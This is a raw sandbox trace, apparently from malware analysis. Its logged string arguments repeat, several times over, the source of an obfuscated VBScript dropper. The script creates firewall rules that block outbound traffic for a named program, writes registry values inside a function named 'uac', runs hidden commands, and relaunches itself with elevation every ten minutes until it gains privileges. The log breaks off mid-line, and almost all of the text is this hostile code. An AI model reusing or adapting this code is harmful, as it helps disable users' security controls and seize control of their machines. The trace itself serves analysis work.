bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0226.315] wcsncmp (_String1="mw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.315] wcsncmp (_String1="w = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.315] wcsncmp (_String1=" = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.316] wcsncmp (_String1="= sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.316] wcsncmp (_String1=" sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst 